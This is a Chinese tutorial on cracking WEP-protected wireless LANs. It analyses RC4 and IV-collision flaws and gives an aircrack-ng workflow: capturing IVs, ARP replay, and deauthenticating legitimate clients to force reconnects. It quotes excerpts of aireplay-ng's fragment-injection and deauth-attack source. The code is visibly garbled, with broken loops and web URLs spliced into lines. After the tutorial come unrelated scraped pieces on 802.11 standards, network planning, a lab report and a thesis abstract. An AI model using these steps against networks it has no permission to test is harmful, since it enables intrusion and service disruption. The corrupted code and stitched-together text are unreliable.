无线局域网的渗透与入侵
作者Waterwave
“The truth is out there.”
---------The X Files And this document is for my dear.
前言
本文的写作目的并非是在现今的WLAN渗透研究上再做出新的突破,因为现今流行的无线网络设备,无论是从家用无线路由器,到商用的中型无线交换设备,所构建的WLAN几乎都使用了WEP或WPA方式进行信号的加密——并非没有更加安全的加密方式——但无线网络的开放性本身就决定了其脆弱性,无线信号这个脆弱的载体与强悍的加密算法的搭配未免显得有些不伦不类,在真正需要高度保密的网络环境中,带有电磁屏蔽的有线传输或光缆传输远比无线网络安全和稳定。
1.无线局域网的加密方式概述
正如前言中所提到的,不管是无线路由器还是无线AP、无线中继,其信号范围几乎是不可控的,因此外界只要进入其信号范围,则有很大可能访问到该无线网络,而一旦成功访问,则网络内所有数据包的交换对其来说都是透明的,则可能通过嗅探抓包对其进行分析与破解。无线设备本身提供WEP和WPA加密方式,有加密就有密钥的生成和分发,有分发就有用户的识别,除去对数据包本身的加密过程之外,对合法用户的识别也是一个重要的方面,这将在稍后提到。
WEP加密方式使用了RSA开发的rc4 prng算法,即“有线对等保密”(Wired Equivalent Privacy,WEP),用于提供等同于有线局域网的保护能力。利用该加密方式,所有客户端与无线接入点的数据都会以一个共享的密钥进行加密,密钥的长度为40位至256位,其长度也自然决定了其破解难度,但就从这上面两句描述中就可以发现其脆弱性所在——“一个共享的密钥”,静态密钥总是会被重复的,这也就提供了被破解的可能。
WPA加密方式,即Wi-Fi Protected Access,本身就是WEP的一个升级版,换言之其基本工作机理与WEP一致,但却修正了WEP的致命弱点——密钥单一性。WPA除了包括802.11 X 机制外,还包含了“暂时密钥完整性协议”(Temporal Key Integrity Protocol,TKIP),TKIP与802.11 X一起为接入终端提供了动态的密钥加
密和相互认证。同时提供了一系列的安全机制来防止黑客在WEP上常用的入侵渗透方式,使其更加安全。
2.WEP的安全性分析
2.1WEP的数据帧结构
首先来分析WEP的数据帧结构,它包含了三个数据项:32位的IV数据项,传输数据项和32位的ICV循环校验码,其中IV为明文传输,后两者为加密传输。IV数据项中又包含了三个数据项:24位的初始向量值(Init Vector),2位的Key ID 和6位的纯填充数据(以0填充)。自然而然,构成WEP SEED的是那24位的Init Vector;而Key ID则用来标识可选的该帧的四个密钥。
2.2WEP的加密算法
再来看加密算法,WEP是采用RSA的RC 4算法,该算法包括初始化算法(KSA)和伪随机子密码生成算法(PRGA)两大部分。由于该算法的核心部分S-box长度可为任意(虽然一般为256字节),因此被归类于“流加密算法簇”范畴。我们用类C的伪代码来描述该算法的初始化部分(KSA):
假设S-box长度和密钥长度都为n。
for (i=0; i;<n; i++)
{
j=(j+s+k)%256;
swap(s, s[j]);
}
在初始化的过程中,密钥的主要功能是将S-box搅乱,i确保S-box的每个元素都得到处理,j保证S-box的搅乱是随机的。而不同的S-box在经过伪随机子密码生成算法的处理后可以得到不同的子密钥序列,并且,该序列是随机的:
i=j=0;
while (明文未结束)
{
++i%=n;
j=(j+s)%n;
swap(s, s[j]);
sub_k=s((s+s[j])%n);
}
由此得到子密码sub_k,将该子密码与明文进行xor运算,得到密文。由于加密使用的异或,所以一旦子密码序列发生重复,密文则可能通过比对被破解。而该算法的缺陷则直接导致了WEP加密的脆弱性,这将在后面的内容中提到。
2.3WEP的数据加解密过程
WEP一般使用64位密钥,由共享密钥和IV直接连接而成。在2.1部分中提到,IV中的2位Key ID被用来标识WEP的四个加解密缺省密钥Default Key,其标识号为0,1,2,3。
加密过程示意图如下:
解密过程则相反,分为以下三个过程:
1.生成密钥流;
2.将密文与密钥流进行异或运算,解密生成明文;
3.通过校验码对信息的完整性进行校验,若校验通过则接收解密后的明文数据
帧,否则丢弃错误的帧。
2.4WEP的身份认证过程
由于WEP采用的是基于共享密钥的认证机制,所以共享密钥在用户与接入点的传递与验证成功与否决定了身份认证的正确性。其主要过程如下:首先由用户客户端自行搜索无线网卡接收范围内的Wi-Fi信号,并显示出公开了SSID的接入点的情况;若接入点选择不公开自己的SSID,则在默认情况下无法取得该接入点的SSID信息,也就无法进行连接。
然后客户端向期望连接的接入点发送申请认证的数据帧,接入点的识别是由SSID完成的。
接入点收到申请认证的数据帧后,用WEP加密算法中的伪随机数生成一个128位的Challenge Text加载到管理数据帧,再将其返回给客户端。
客户端再将该Challenge Text加载到管理帧,用共享密钥与新的IV向量对该帧加密,再传送给接入点。
最后接入点校验该帧的信息正确性与CRC正确性判断该用户是否为合法用户。
2.5WEP的本质缺陷
由前面几节对WEP的分析,我们可以看出WEP本身存在以下的缺陷:
1.密钥的重复问题
如2.2节里所示,WEP的加密算法是基于RC 4的。一旦攻击者获得了由相同的密钥流序列加密后所得的两段密文,再将两段密文异或,则得到的也是两段明文的异或,由此密钥则失效。
2.IV冲撞问题
现在大多数的WEP破解工具都是利用本缺陷工作的。由于不同的数据帧加密时使用的IV值都是同一个,数据帧加密密钥本身是由基密钥与IV值串联得来的,而用户们常常使用Key ID为0的default key,因此数据帧加密密钥也是不安全的。另外,IV值是明文发送的,攻击者可以通过观察来获得相同数据帧加密密钥的数据帧来获得密钥。
WEP里规定IV长度为24位,即IV数值的可选范围值只有224个,这样在理论上只要传输224个数据帧以后就会发生一次IV重用。而由于IV是明文传输的,在攻击者得到两个或多个使用相同密钥的数据帧时,还能通过静态分析更快地取得明文。
3.由WEP破解工具原理看入侵思路
国内外破解WEP的工具软件较多,大致的入侵思路仍是根据前文中提到的WEP漏洞,使用以下步骤入侵:
A.使用Netstumbler(Windows下)或kismet(Linux下)等软件,将无线网卡配置为混杂模式,扫描周边Wi-Fi信号,并获得其ESSID和BSSID、IP以
及频道ID。但根据我的测试,Netstumbler对于不公开ESSID的接入点则
无法发现;而Linux下的kismet在通常模式(即无其他客户端连接接入
点)下也能发现不公开ESSID的接入点,虽然也无法获得其ESSID,但是
能获得接入点的MAC地址和频道号,也便于为后面的注入攻击做好准
备。因此,WEP的破解,仍然是在Linux系统下为最好。
B.不管是在Windows平台还是在Linux平台,WEP的破解渗透首选工具仍然是Aircrack-ng系列工具包。在Windows下,也有WinAircrack这种GUI
版本,但包含工具较少,且功能较单一。在Linux下,Aircrack工具包包
含以下工具:
1)Airodump-ng:802.11数据包截取工具
2)Aireplay-ng:802.11数据包注入工具
3)Aircrack-ng:WEP 及WPA-PSK key 破解主程序
4)Airdecap-ng:WEP/WPA 数据包解密程序
5)Airmon-ng:802.11 网络监听程序
6)Packetforge-ng:802.11 数据包制造程序
7)Airtun-ng:802.11 加密数据包集及数据包注入程序
C.根据WEP的IV冲撞缺陷,使用Airodump截取足够多(通常在10,0000以上)的数据包,并生成cap所得的ivs文件,再利用aircrack做算法破
解,这算是正统的做法。在AP没有客户端连接,或者有客户端连接但
数据流量较小的情况,为了增加单位时间内数据包的数量,采用Aireplay
不断发送ARP包给AP。
D.但由于AP中经常内建防止攻击的机制,所以在用Aireplay的攻击模式3一段时间后,AP很可能主动地阻断来自于攻击者MAC的ARP包,导致
数据包数量下降。因此Aireplay也提供了另一种攻击模式0,此种攻击
模式直接对已经成功连接上AP的合法无线客户端(其MAC可以由kismet
扫描得到)进行ARP攻击,导致其掉线。然后该合法客户端再次向AP
发送带有SSID以及包含共享密钥和IV的数据帧,再次取得连接。如此
反复,则可以更加直接和大量地取得数据包。当然,这种方式的缺陷也
很明显,反复频繁地掉线很可能引起对方的警觉
E.Aircrack工具包还有其他数种注入攻击模式,可以应对多种情况,在此我不再赘述。
附录:由Aircrack源代码看原理的实践过程
由于单纯的解密算法与实现代码阅读快感实在太差,所以我并不打算对aircrack的源代码做分析,而只是针对该工具组里最核心的注入程序aireplay-ng 的源程序,拣取比较有独创性和特殊意义的几段作简要分析(源代码将附于附件):
以上是aircrack-ng的LINUX版本源代码,可以看出aircrack的几个主要组件aircrack, aireply, airodump都在其中。其中的主要部分包括算法破解的aircrack——这一部分我不打算讲解,如对算法有兴趣可自行阅读源代码;另一部分是注入入侵的aireplay,我将重点分析一下这个程序。
int n, i, ret;
/* check the arguments */
memset( &opt, 0, sizeof( opt ) );
memset( &dev, 0, sizeof( dev ) );
opt.f_type = -1; opt.f_subtype = -1;
opt.f_minlen = -1; opt.f_maxlen = -1;
opt.f_tods = -1; opt.f_fromds = -1;
opt.f_iswep = -1; opt.ringbuffer = 8;
opt.a_mode = -1; opt.r_fctrl = -1;
opt.ghost = 0; opt.npackets = -1;
opt.delay = 15; opt.bittest = 0;
opt.fast = 0; opt.r_smac_set = 0;
opt.npackets = 1; opt.nodetect = 0;
/* XXX */
#if 0
#if defined(__FreeBSD__)
/*
check what is our FreeBSD version. injection works
only on 7-CURRENT so abort if it's a lower version.
*/
if( __FreeBSD_version < 700000 )
{
fprintf( stderr, "Aireplay-ng does not work on this "
"release of FreeBSD.\n" );
exit( 1 );
}
首先是一段程序对*nix系统的自检,以检查该程序是运行环境是否正确,一般来说现在的主流*nix在gcc编译环境正确的情况下,不会出什么问题。
之后是对各个输入参数如BSSID或ESSID等的合法性检查,此部分代码就略过。
int attack_check(uchar* bssid, char* essid, uchar* capa, struct wif *wi)
{
int ap_chan=0, iface_chan=0;
iface_chan = wi_get_channel(wi);
if(bssid != NULL)
{
ap_chan = wait_for_beacon(bssid, capa, essid);
if(ap_chan < 0)
{
PCT; printf("No such BSSID available.\n");
return -1;
}
if(ap_chan != iface_chan)
{
PCT; printf("%s is on channel %d, but the AP uses channel %d\n", wi_get_ifname(wi), iface_chan, ap_chan);
return -1;
}
}
return 0;
}
攻击前对WLAN的频道、BSSID等的预先探测。
void send_fragments(uchar *packet, int packet_len, uchar *iv, uchar *keystream, int fragsize, int ska)
{
int t, u;
int data_size;
uchar frag[32+fragsize];
int pack_size;
int header_size=24;
data_size = packet_len-header_size;
packet[23] = (rand() % 0xFF);
for (t=0; t+=fragsize;)
{
//Copy header
memcpy(frag, packet, header_size);
//Copy IV + KeyIndex
memcpy(frag+header_size, iv, 4);
//Copy data
if(fragsize <= packet_len-(header_size+t-fragsize))
memcpy(frag+header_size+4, packet+header_size+t-fragsize, fragsize);
else
memcpy(frag+header_size+4, packet+header_size+t-fragsize, packet_len-(header_size+t-fragsize));
//Make ToDS frame
if(!ska)
{
frag[1] |= 1;
frag[1] &= 253;
}
//Set fragment bit
if (t< data_size) frag[1] |= 4;
if (t>=data_size) frag[1] &= 251;
//Fragment number
frag[22] = 0;
for (u=t; u-=fragsize;)
{
frag[22] += 1;
}
// frag[23] = 0;
//Calculate packet lenght
if(fragsize <= packet_len-(header_size+t-fragsize))
pack_size = header_size + 4 + fragsize;
else
pack_size = header_size + 4 + (packet_len-(header_size+t-fragsize));
//Add ICV
add_icv(frag, pack_size, header_size + 4);
pack_size += 4;
//Encrypt
xor_keystream(frag + header_size + 4, keystream, fragsize+4);
//Send
send_packet(frag, pack_size);
if (t if (t>=data_size) break; } } 以上是对AP发送管理帧,试图建立与AP的合法连接。 int do_attack_deauth( void ) { int i, n; int aacks, sacks, caplen; struct timeval tv; fd_set rfds; if(getnet(NULL, 0, 1) != 0) return 1; if( memcmp( opt.r_dmac, NULL_MAC, 6 ) == 0 ) printf( "NB: this attack is more effective when targeting\n" "a connected wireless client (-c n = 0; while( 1 ) { if( opt.a_count > 0 && ++n > opt.a_count ) break; usleep( 180000 ); if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 ) { /* deauthenticate the target */ memcpy( h80211, DEAUTH_REQ, 26 ); memcpy( h80211 + 16, opt.r_bssid, 6 ); aacks = 0; sacks = 0; for( i = 0; i < 64; i++ ) { if(i == 0) { PCT; printf( "Sending 64 directed DeAuth. STMAC:" " [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r", opt.r_dmac[0], opt.r_dmac[1], opt.r_dmac[2], opt.r_dmac[3], opt.r_dmac[4], opt.r_dmac[5], sacks, aacks ); } memcpy( h80211 + 4, opt.r_dmac, 6 ); memcpy( h80211 + 10, opt.r_bssid, 6 ); if( send_packet( h80211, 26 ) < 0 ) return( 1 ); usleep( 2000 ); memcpy( h80211 + 4, opt.r_bssid, 6 ); memcpy( h80211 + 10, opt.r_dmac, 6 ); if( send_packet( h80211, 26 ) < 0 ) return( 1 ); usleep( 2000 ); while( 1 ) { FD_ZERO( &rfds ); FD_SET( dev.fd_in, &rfds ); https://www.doczj.com/doc/0f16050966.html,_sec = 0; https://www.doczj.com/doc/0f16050966.html,_usec = 1000; if( select( dev.fd_in + 1, &rfds, NULL, NULL, &tv ) < 0 ) { if( errno == EINTR ) continue; perror( "select failed" ); return( 1 ); } if( ! FD_ISSET( dev.fd_in, &rfds ) ) break; caplen = read_packet( h80211, sizeof( h80211 ), NULL ); if(caplen <= 0 ) break; if(caplen != 10) continue; if( h80211[0] == 0xD4) { if( memcmp(h80211+4, opt.r_dmac, 6) == 0 ) { aacks++; } if( memcmp(h80211+4, opt.r_bssid, 6) == 0 ) { sacks++; } PCT; printf( "Sending 64 directed DeAuth. STMAC:" " [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r", opt.r_dmac[0], opt.r_dmac[1], opt.r_dmac[2], opt.r_dmac[3], opt.r_dmac[4], opt.r_dmac[5], sacks, aacks ); } } } printf("\n"); } else { /* deauthenticate all stations */ PCT; printf( "Sending DeAuth to broadcast -- BSSID:" " [%02X:%02X:%02X:%02X:%02X:%02X]\n", opt.r_bssid[0], opt.r_bssid[1], opt.r_bssid[2], opt.r_bssid[3], opt.r_bssid[4], opt.r_bssid[5] ); memcpy( h80211, DEAUTH_REQ, 26 ); memcpy( h80211 + 4, BROADCAST, 6 ); memcpy( h80211 + 10, opt.r_bssid, 6 ); memcpy( h80211 + 16, opt.r_bssid, 6 ); for( i = 0; i < 128; i++ ) { if( send_packet( h80211, 26 ) < 0 ) return( 1 ); usleep( 2000 ); } } } return( 0 ); } 以上是采用的de-auth攻击模式,即对WLAN内的合法连接的终端进行ARP攻击,强制他们掉线,并使他们重新向AP发送管理帧以重新连接,并监听及复制其管理帧。 至于其他的攻击模式,基本原理与以上模式一致,在源代码里很容易就能看出,在此我便不再赘述。 竭诚为您提供优质文档/双击可除 WLAN协议 篇一:无线局域网协议(802.11b)详解 无线局域网协议(802.11b)详解 (作者:三石) 价格便宜的便携式计算机、移动电话和手持式设备的日趋流行,以及internet应用程序和电子商务的快速发展,使用户需要随时进行网络连接。为满足这些需求,可以使用两种方法将便携式设备连接到网络,而没有电缆所带来的不便。这两种标准就是ieee802.11b和bluetooth。ieee802.11b 是一种11mb/s无线标准,可为笔记本电脑或桌面电脑用户提供完全的网络服务。 ieee802.11b的特点和应用范围 ieee802.11b应用的范围: 两种技术的比较: 发展趋势 目前这些技术还处于并存状态,由于ieee802.11b和蓝牙的载波频带都使用2.4ghz频带,当同时收发这两种规格的数据时,有可能引起数据包冲突等电波干扰等问题;从长 远看,随着产品与市场的不断发展,它们将走向融合,而其中最有竞争力的就是蓝牙技术。 美国mobilian公司推出了兼具无线lan和蓝牙功能的 芯片组。这个由两个芯片构成的芯片组具备无线lan的标准方式ieee802.11b的无线收发功能和蓝牙功能。mobilian公司此次开发的芯片组中,通过采用消除电波干扰的方法,实现了两种规格数据通信的同时进行。 推进10m近距离无线通信技术标准化的ieee802.15委 员会日前采纳了可使蓝牙和ieee802.11b共存的技术提案。此次采纳的是美国mobiliancorp.和美国symboltechnologies,inc.以及美国nist等共同提出的方案。提案书预定于20xx年下半年公布。 intersil、siliconwave合作开发蓝牙和ieee802.11b 双模(dual-mode)wlan解决方案,使手提电脑及其它设备 能通过蓝牙无线通信方式连结公司的lan或其它类似组件。 intersil与siliconwave合作的目标是要开发出一系列双模解决方案,将兼容蓝牙的无线设备,与wecawi-Fi的ieee802.11b无线设备构建在同一平台上。估计初期将推出cardbus32与minipci两种平台,然后的 目标是通过动态交换技术,使两种设备都能使用一般普通天线。这种双模无线电设备将比以往的无线设备更小。 篇二:家庭无线网络协议和标准简介 目录 一、问题背景概述 (2) 二、需求分析 (2) 三、初步分析及结果 (4) 四、企业布局与规划 (6) 五、方案分析评估 (12) 附录参考文献 (19) 一、问题背景概述 计算机从问世开始,在短短的几十年时间里,已经从美国传向世界各地。尤其是进 入21世纪以来,网络的作用已经处于举足轻重的地位,逐渐渗入到社会生活的方方 面面。在经济快速发展的今天,网络对于企业的重要性不言而喻。我们知道一个人不 可能脱离这个社会而存在,同样对于企业而言,它不可能脱离与他相关的企业之间的 联系,而联系它们的媒介在很大程度上是通过计算机网络来实现的。在今天,脱离网 络的企业必将被网络和相关领域的企业所淘汰。从另一个方面来说,企业要不断的学 习和更新现有的网络资源,如何使自己的网络资源得到最大效益的利用,是现在多数 企业所面临的一个严峻问题。时至今日,我们的学习和生活已经离不开网络了。而我 们所关心的问题是如何合理的构建网络,以使得构建的网络更高效的运行。 然而,目前国内的许多企业对于网络的作用缺乏足够的认识,认为网 络和自己的企业关系不大,在互联网上建立起自己网站的企业为数甚少, 即使企业建立了自己的网站,也并未充分利用网络,存在的另一个问题是 一些网站的内容贫乏、制作粗糙,在这些所谓的网页上,人们看不到关于 企业的详细信息,例如,只有企业介绍和产品简介,却丝毫看不出企业的独特风格和完善的企业功能在哪里,既难以形成固定的网络受众,更无法借此而促进销售并产生品牌效应。面对21世纪越来越激烈的挑战,企业必须学会网上生存,重视利用互联网宣传企业形象,销售自己的产品,开展网络消费心理研究。 因此,一个企业如果想要有更长远的发展就一定要组建一个合理的网络。从某种意义上讲,一个企业有没有自己的网络和网站,建设的网络和网站质量的好坏,直接关系到企业的前途和发展,而不仅仅是几千元的建站费的问题,尤其是对中小企业来说。 二、需求分析(假设做的是一个500人的公司) 公司为了能与现代生产需要接轨,能及时的获得外界信息,又能让外界随时了解本公司“供求信息”的最新动态,所以,公司有自己的网站,向外部发布自己的信息。同时还能利用网络的连通性和资源共享性提高生产力的需求。 而中小企业通常是指规模在500人以下的企业,如果进一步细分,又可分为100人以下的小型企业、100~250人的中小型企业,以及250人以上的中型企业。从广义的角度,又可以将同等规模的政府、科研及教育等单位也作为中小企业来看待。相对于中小企业的人数,中小企业网络是指节点数小于500个的网络。 目前看来,中小规模局域网的需求特点和建网策略有以下几点: 1、高性能的百兆网络核心 随着网络用户数量和应用种类的不断增加,10/100M网络成本的不断下降,目前大部分用户的桌面系统均已采用百兆到桌面,网络主干则为百兆以太网络。与以前的局域网络技术相比,百兆网络具备简单、高效、建设成本低等显着优势。尤其是基于铜缆双绞线的百兆以太网络技术产品的推出,使百兆网络的建设成本进一步降低,百兆网络无疑已经成为建设企业网络核心的最佳之选。 一、实验名称:无线局域网WLAN的构建和配置 二、实验内容 无线局域网(Wireless Local Area Network,即WLAN)是利用无线通信技术,在一定的局部范围内建立的网络,是计算机网络与无线通信技术相结合的产物。它以无线传输媒体作为传输介质,提供传统有线局域网的功能,并能使用户实现随时、随地的网络接入。之所以称其是局域网,是因为受到无线连接设备与计算机之间距离的限制而影响传输范围,必须在区域范围之内才可以组网。 无线局域网的特点 (1)安装便捷、维护方便 免去或减少了网络布线的工作量,一般只要安装一个或多个接入点(Access Point,AP)设备,就可以建立覆盖整个建筑物或区域的局域网。 (2)使用灵活、移动简单 一旦无线局域网建成后,在无线网的信号覆盖范围内任何一个位置都可以接入网络。使用无线局域网不仅可以减少与布线相关的一些费用,还可以为用户提供灵活性更高、移动性更强的信息获取方法。(3)易于扩展、大小自如 有多种配置方式,能够根据需要灵活选择,能胜任从只有几个用户的小型局域网到上千用户的大型网络 无线局域网的组建 无线局域网的主要设备 1无限网卡.无线接入器,无线天线 无线局域网的组网模式 1.Ad-Hoc模式,即点对点无线网络 2.Infrastructure模式,即集中控制式网络 三、实验步骤 组建步骤 Ad-Hoc(点对点)模式无线局域网的组建 一般的无线网卡在室内环境下传输距离通常为40m左右,当超过此有效传输距离就不能实现彼此之间的通信。因此,该种模式比较适合一些小规模甚至临时性的无线局域网互连需求。这里以两台计算机为例,介绍组建Ad-Hoc无线局域网的具体过程(无线网卡以USB接口的TL-WN320G为例)。其中,要求两台计算机共享一条带宽接入Internet。 第1步:把USB接口的无线网卡接到其中的一台计算机上,机器提示找到新硬件,根据屏幕提示安装无线网卡的驱动程序。 第2步:鼠标右击桌面的“网上邻居”图标,选择“属性”选项,可以看到该机除了原有的连接外网的图标之外,还新增加了一个“无线网络连接”图标,这就是无线网卡对应的连接图标。 第3步:设置无线网络 无线网卡驱动程序安装完成后,在屏幕右下角出现一个闪动的图标,如下左图所示。鼠标双击“无线网络图标”,出现右图所示的无线网络配置对话框。在网络模式选项框内,选择“对等(Ad-Hoc)”,在网络名称(SSID)选项框内,勾择“自动扫描网络名称”。其他的设置采用默认设置,完成后单击【连接】按钮 北京大学毕业设计论文 无线局域网的应用与发展 (以802.11b为讨论重点) The Development and Application of Wireless LAN (Focus in 802.11b) 班级:G0122193 学号:1202241997 导师:吴增德 姓名:白方 北京大学计算机科学与技术网络学院 2010年4月 本次本科毕业设计的要求是为跟踪目前无线上网技术并探讨以后无线数据传输的发展方向,相信随着科技的不断进步,数据传输无线技术的应用会为个人带来更为方便的处理信息的方式.无线上网是无线数据传输目前应用最为广泛且最基本的一种模式.其中又以WLAN(无线局域网)的技术为主,另外还有通过GPRS或者CDMA1X等各种不同的无线接入模式. 在具体设计中,会为分为几大部分.1,概述.无线宽带接入技术国内外目前状况2,无线宽带技术与设备总述.3,无线宽带技术解决方案.4,WLAN网络管理与认证计费系统.5,WLAN 的应用方案分析。6,总结与展望 7,参考资料.. The main issue for this article is discussing the future expending of wirless data internet working. By the improvement of technology, the application of wireless data transmission will bring more convience of data transaction. Wireless data internet working application currently is the basic and the wildest used concept, and especially in WLAN technology, GPRS or CDMAIX wireless mode. There are several topics in the following article: 1.The development actuality and trend of wireless broadband communications 2.The tech and equipment of wireless broadband communications 3.Wireless broadband communications solution 4.WLAN management and billing 5.Analysis of WLAN application 6.Conclusion 7.Reference 无线局域网安全隐患分析及对策 摘要:随着无线网络的不断发展,其安全性正面临着严峻挑战,无线网络的安全已成为十分重要的研究课题.介绍无线局域网的特点,分析其安全隐患,并给出安全对策.经过实践验证,效果较为理想. 关键词:无线局域网;网络安全;对策 近年来,随着我国网络技术的发展与普及,无线网络也呈现出突飞猛进的态势.目前,虽然无线局域网还要依靠有线网络,但无线网产品也逐渐走向成熟,在实际网络应用中发挥其特有的灵活性和便捷性. 1 无线局域网特点 无线局域网是计算机网络技术和无线通信技术相结合的产物,是在有线局域网的基础之上,通过添加无线访问点、无线网桥等硬件设备实现对有线网络扩充.与传统的有线网相比,无线网最大的优势在于不受地理位置的限制,能到特定区域内随时随地上网.具体表现为:(1)移动性 在无线局域网中,无线网卡体积小且携带方便,利用它就可以很方便地组建网络.另外只要在天线信号覆盖区域内,可以使用户随时随地地接人Intemet.而对于有线网络,其限定了用户的使用范围,用户只能在固定的位置接人Intemet. (2)易节约、易扩展 缺乏灵活性是有线网络的不足点.在建设有线网络的规划中,考虑到以后网络扩展,往往在主干线路实施方面投入了大量的建设投资.而WLAN能够根据需要灵活选择配置方式,能够根据实际需要灵活选择网络覆盖的范围及相关容量. (3)组建简单 无线网是以空气为介质进行数据传输,因此就省去了有线网烦琐的网络布线与施工等工作.一艘隋况下,组建一个区域的无线网络,只需安装一个或多个无线接人点设备. 2 无线局域网安全隐患 安全一直是网络通信的重要问题,由于无线局域网自身的特点,安全问题就显得更为重要.与有线网络不同,无线网是在开放的环境下以空气为介质进行数据的传输,非法用户可以通过相关网络软件在接入点覆盖范围内轻易获取传输数据,因而信息容易被窃取.由于WLAN开放的传输介质使其很易遭到攻击,其安全隐患表现在以下几个方面: (1)信息易受窃听 WLAN采用2.4 GHz范围的无线电波进行通信,而且信道是开放的,窃听者只要有带无线网卡的客户机或无线扫描器,就可获取数据或对数据进行分析,获取有用信息,不能有效阻止窃听者的窃听.或者通过软件对无线网卡的标准NIC信息进行修改,也能获得相关有用信息.(2)篡改信息 在WLAN应用过程中,发射功率大的网络节点可以覆盖发射功率小网络节点,这样,窃听者在节点间传送的数据时进行篡改数据,进而产生错误信息.因此,窃听者可以通过增加天线发射功率,使较强的非法节点覆盖较弱的授权节点,在节点间传送的数据时进行篡改数据,使得 【WLAN从入门到精通-基础篇】第3期——WLAN标准协议 在WLAN的发展历程中,一度涌现了很多技术和协议,如IrDA、Blue Tooth和HyperLAN2等。但发展至今,在WLAN领域被大规模推广和商用的是IEEE 802.11系列标准协议,WLAN也被定义成基于IEEE 802.11标准协议的无线局域网。我们对802.11已不陌生,在购买支持WLAN功能的产品时都能看到802.11的影子。本期我们讲下802.11主要的具有里程碑意义的标准协议:802.11a、802.11b、802.11g、802.11n和802.11ac。虽然协议比较枯燥乏味,但了解了这些协议,有助于我们部 署WLAN,下面就跟随小编一起看下这几个主要协议吧. WLAN和有线局域网最大的区别就是“无线”,通过上期的学习我们知道WLAN通信媒介是射频,射频和有线局域网的媒介(电缆或光纤)相比具有完全不一样的物理特性,这就导致WLAN的物理层(PHY)和媒介访问控制层(MAC)不同于有线局域网。所以,802.11协议主要定义的就是WLAN的物理层和MAC层。 在20世纪90年代初为了满足人们对WLAN日益增长的需求,IEEE成立了专门的802.11工作组,专门研究和定制WLAN的标准协议,并在1997年6月推出了第一代WLAN协议——IEEE 802.11-1997,协议定义了物理层工作在ISM的2.4G频段,数据传输速率设计为2Mbps。该协议由于在速率和传输距离上的设计不能满足人们的需求,并未被大规模使用。 随后,IEEE在1999年推出了802.11a和802.11b。 802.11a工作在5GHz的ISM频段上,并且选择了正交频分复用OFDM(Orthogonal Frequency Division Multiplexing)技术,能有效降低多路径衰减的影响和提高频谱的利用率,使802.11a的物理层速率可达54Mbps。 802.11b则依然工作在2.4GHz的ISM频段,但在802.11的基础上进行了技术改进,使802.11b的通信速率达到11Mbps。 OFMD是一种多载波调制技术,主要是将指定信道分成若干子信道,在每个子信道上使用一个子载波进行调制,并且各子载波是并行传输,可以有效提高信道的频谱利用率。 虽然802.11b提供的接入速率比802.11a低,但当时5GHz芯片研制过慢,待芯片推出时802.11b已被广泛应用。由 于802.11a不能兼容802.11b,再加上5GHz芯片价格较高和地方规定的限制等原因,使得802.11a没有被广泛采用。 在2000年初,IEEE 802.11g工作组开始开发一项既能提供54Mbps速率,又能向下兼容802.11b的协议标准。并 在2001年11月提出了第一个IEEE 802.11g草案,该草案在2003年正式成为标准。802.11g兼容了802.11b,继续使 用2.4GHz频段。为了达到54Mbps的速率,802.11g借用了802.11a的成果,在2.4GHz频段采用了正交频分复用(OFDM)技术。IEEE 802.11g的推出,满足了当时人们对带宽的需求,对WLAN的发展起到了极大的推动作用。 大家可能会有疑问:为什么不在1999年制定802.11b标准时就直接采用和802.11a相同的OFDM技术,这样就可以更早的 在2.4GHz频段上取得54Mbps的速率了,而不必等到2001年底的802.11g的出现。事实上在1999年讨论802.11b的时 候,OFDM技术确实被提出应用到802.11b标准中,但当时美国联邦通信协会(FCC)禁止在2.4GHz频段使用OFDM,这条禁令直到2001年5月才被撤销,6个月后,采用OFDM技术的802.11g草案才得以顺利出台。 在急速发展的网络世界54Mbps的速率不会永远满用户需求。在2002年一个新的IEEE工作组——IEEE 802.11任务 组N即TGn(Task Group n)成立,开始研究一种更快的WLAN技术,目标是达到100Mbps的速率。该目标的实现一波三折,由于小组内两个阵营对协议标准的争论不休,新的协议直到2009年9月才被敲定并批准,这个协议就是802.11n。在长 达7年的制定过程中,802.11n的速率也从最初设计的100Mbps,完善到了最高可达600Mbps,802.11n采用了双频工作模式,支持2.4GHz和5GHz,且兼容802.11a/b/g。 802.11n标准刚刚尘埃落定后, IEEE就开始了下一代的WLAN标准协议——802.11ac的制定工作。并在2013年正式推出 了802.11ac标准协议,802.11ac工作在5GHz频段,向后兼容802.11n和802.11a,80.211ac沿用了802.11n的诸多技术并做了技术改进,使速率达到1.3Gbps。 通过下表有助于我们了解802.11各协议的主要参数。 华为产品在V200R003C00及之前版本支持802.11n、802.11g、802.11b和802.11a,从V200R005C00版本开始支 持802.11ac,并推出了支持802.11ac的AP:AP5030DN和AP5130DN。 华为产品在V200R003C00版本及之前版,需要使用配置命令配置射频的类型: radio-type ? [6605_v2r3_111-wlan-radio-prof-test] radio-type 构建无线局域网的主要设备及功能特点概述 1.无线网卡 其作用跟有线网卡类似,主要分为PCI卡、USB卡和笔记本专用的PCMCIA卡三类,如下图所示为PCMCIA无线局域网卡。 无线网卡现在主要有两类,一类为无线局域网卡,一类为无线广域网卡。前者要和无线路由器结合使用,后者要到移动或联通开通服务。在外观上两者主要的区别在于广域网卡多了个插sim卡的插槽。 (1)无线局域网卡主要是用于办公室和公司,笔记本里面迅驰电脑所说的就是这类网卡。举例说明:我办公室有4台台式机,2台笔记本,1台是迅驰的机子,1台不是迅驰的机子。买一个无线路由器(4口的),无线路由器跟普通的路由器的区别也就是多一根天线。用网线把宽带和台式机连起来(和普通的有线局域网一样安装)然后就是关于无线这块了,迅驰的机子可以直接连到宽带上网,不是迅驰的机子就必须再买一块无线网卡了,装上后设置些参数就可以连网了。它的工作原理其实很简单的,无线路由器就相当于一个发射基站把宽带传过来的信号发射出去,计算机上的无线网卡就相当于接收器,接收信号连入网络。 (2)无线广域网卡才是真正意义上的无线上网,理论上只要手机信号能覆盖到的地方都可以连接上网。具体使用:买个无线网卡(广域网),然后到移动或联通开通上网服务,开通后你把sim卡插到无线网卡上,把无线网卡插到笔记本上,安装软件就OK了。这样就可以进行无线上网了。 注:无线网卡有很种接口,台式机上一般用pci接口和usb接口,而笔记本上一般用pcmcia 接口或是内置的 现在联通和移动都推出包年服务,移动1200联通2500,赠送无线网卡。 对于无线局域网网卡,还可以点对点连接。也就是说两台都带无线的笔记本,可以点对点连起来建立局域网,进行数据交换。特别是单条魔兽阿,cs阿,很爽。 (3)无线上网卡 